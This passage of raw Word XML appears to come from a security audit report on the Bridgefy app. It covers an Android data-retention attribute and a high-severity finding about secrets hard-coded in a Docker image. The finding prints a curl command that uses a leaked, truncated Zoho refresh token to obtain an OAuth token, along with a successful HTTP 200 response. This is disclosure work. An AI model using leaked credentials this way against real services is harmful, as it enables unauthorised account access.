      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attribute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>android:hasFragileUserData</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>When</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the user will be prompted to keep the app information despite uninstallation.</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7"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487630336">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>185089</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="110" name="Graphic 110"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="110" name="Graphic 110"/>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4.573999pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15686144;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape83" coordorigin="1440,291" coordsize="2880,0" path="m1440,291l4320,291e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="105"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>176</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId263">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.cvedetails.com/vulnerability-list.php?vendor_id=1224&amp;product_id=19997&amp;...</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>177</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="20"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId264">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://www.cl.cam.ac.uk/~drt24/papers/spsm-scoring.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>178</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId78">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>http://developer.android.com/reference/android/view/Display.html#FLAG_SECURE</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="74"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="2824"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2788752" cy="1370742"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="111" name="Image 111"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="111" name="Image 111"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId265" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2788752" cy="1370742"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100"/>
        <w:ind w:left="354" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fig.:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Uninstall</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>prompt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>box</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>keeping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Since the default value is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, there is no security risk in failing to set this attribute. However, it is still recommended to explicitly set this setting to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>false </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to define the intention of the app to protect user information and ensure all data is deleted when the app is uninstalled. It should be noted that this option is only usable if the user tries to uninstall the app from the native settings. Otherwise, if the user uninstalls the app from Google Play, there will be no prompts asking whether data should be preserved or not.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250017" w:id="38"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-038</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP4:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Services</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>via</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Image</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Leaks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720" w:right="372"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Retest Notes: </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Fix Verified. The Bridgefy team resolved this issue and 7ASecurity verified that the fix is valid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="366"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that the Bridgefy Docker image leaks authentication tokens that grant access to various services. Specifically, the SDK application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>requires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>secrets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>connect to various backends including MongoDB,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ZOHO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>similar.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>It</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>discovered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>such secrets are hard-coded in the docker image during the build process, which is a bad practice. Malicious attackers, with access to the docker registry, might leverage this weakness to gain access to arbitrary services by fetching the image and extracting the secrets hardcoded in the Docker image.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Resources:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>745354931789</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>target)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>During the assignment, the zoho credentials leaked in this fashion were verified and confirmed to be correct:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -i -X POST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"https://accounts.zoho.com/oauth/v2/token?refresh_token=10[...]"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HTTP/1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ZGS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: Sat, 07 Jan 2023 16:19:49 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GMT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="4643" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
